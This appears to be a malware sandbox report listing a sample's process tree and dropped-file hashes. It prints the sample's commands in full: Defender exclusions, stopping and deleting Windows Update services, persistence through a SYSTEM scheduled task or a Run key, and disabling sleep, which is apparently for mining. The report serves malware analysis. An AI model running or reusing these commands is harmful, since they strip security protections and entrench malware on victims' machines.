C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:4084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:2096
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:728
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4560
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3116
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:5068
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2292
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:1560
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:364
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1376
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2304
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3536
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3488
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1908
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:836
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:440
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
PID:3668
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1780 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:2392
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exeC:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe1⤵
- Executes dropped EXE
PID:912
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 2068 -ip 20681⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exeC:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe1⤵
- Executes dropped EXE
PID:1432
-
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exeC:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe1⤵
- Executes dropped EXE
PID:2176
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD560804e808a88131a5452fed692914a8e
SHA1fdb74669923b31d573787fe024dbd701fa21bb5b
SHA256064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61
SHA512d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a
-
Filesize
1KB
MD52881486cb622b49cd31ec765d5b27d95
SHA18875a180bf708b6c7b8eaafe00942919637994fc
SHA2562e8161c35f5311e9b8ed8439454451e83019ee609fd819b888999a67626bd94d
SHA512a1616f3c9826967fe0cb2bd1e74032c849c912a6ea5c7b3a272bd9d727a3ae6879968cfe296f25433b0bd3f7a1aa6eaa7fc013ef93a2fea2de09d57de7290dff
-
Filesize
84KB
MD535ba5ab028d9f198a00d379e471fe37f
SHA1897015c4f850ca6d17f66c66afd80a9a3eac5226
SHA256eb09742574090c21d3c22d68bb81a68b8b647798437af481b1eb958c37baf525
SHA5126dcf96f3774bdde600c4e290424ae5051ce56695aa2c04d5dc319d9cb3095c28720137988705c1f3cd60f139c5f7d66bdd11eea2533d2d3bc1e5d76c079c2db1
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
249KB
MD508240e71429b32855b418a4acf0e38ec
SHA1b180ace2ea6815775d29785c985b576dc21b76b5
SHA256a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA51269fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
949KB
MD535eb44f660dba74a18da3b07a5639d59
SHA11bc2c80bd7d579c09749cf1e94fcfc886d69f29a
SHA2563c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93
SHA51222ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e
-
Filesize
949KB
MD535eb44f660dba74a18da3b07a5639d59
SHA11bc2c80bd7d579c09749cf1e94fcfc886d69f29a
SHA2563c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93
SHA51222ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e
-
Filesize
949KB
MD535eb44f660dba74a18da3b07a5639d59
SHA11bc2c80bd7d579c09749cf1e94fcfc886d69f29a
SHA2563c3c81a5e9751c12fd812d7b0279dfe71699a2718e33bce26d941d4d1bd2bb93
SHA51222ddc5052483b429f29719b814e4de2662884bb9bb0e6fd7e3bacd73e3f87cc70d4fdc50213faffc0125bf5b2db0367081fe35ce71070ff5a2550d6d7194757e
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
1.0MB
MD516fd83a682162d6edc119dc12c9990dc
SHA14b5f38c78c8e5f1333989da0912e945335f82c95
SHA25636be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8
SHA5125af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5
-
Filesize
1.0MB
MD516fd83a682162d6edc119dc12c9990dc
SHA14b5f38c78c8e5f1333989da0912e945335f82c95
SHA25636be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8
SHA5125af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5
-
Filesize
1.0MB
MD516fd83a682162d6edc119dc12c9990dc
SHA14b5f38c78c8e5f1333989da0912e945335f82c95
SHA25636be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8
SHA5125af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5
-
Filesize
1.0MB
MD516fd83a682162d6edc119dc12c9990dc
SHA14b5f38c78c8e5f1333989da0912e945335f82c95
SHA25636be2f6cccdf3edc709e7dabcbe529d4f6390d3c624ba10fb471bd05d36060c8
SHA5125af414c95db738d0a65fdd67f2ff3923c451ee68856237f55626586aac14efe62288f5b8d74a5fbf2eaba9e6a1689cea89b856212a597ab12a3a4b0097e3f3a5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5a50c29de640e5957ed3802b419ae72c7
SHA1c891a511854fa10544aaf44da98dc97780d54aa3
SHA256df11e0cdaf259ac83da3b3f21fe0fde6f12d39b89f1d6ba9ba085b689b936f87
SHA512b6ea40e1850843aa3ba7194ec0b683c6b15478c39266e6e445ee1be8f2c4d4ffc74274110fe5ca41859e9f8b746ade84577b705c9655e9f9b2d7a4bdd91e9153
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5f78c1239f2684799917efb4bd4ec1db0
SHA14da5f2b120b406263b4e24ccb31815e5ba69e717
SHA256eeee8ea682c3128e5cfc265b9cd10622326150030c108f2dfb8ce3d14fb66f5b
SHA51289d65238ed7794ec3ac78a4f694ab9630bb62512d9f955b501a354f86364b203bd0c748ad6a8893ce0429dc5d6931e2b0b7da46f9764b0e8fca8b6c3be53b376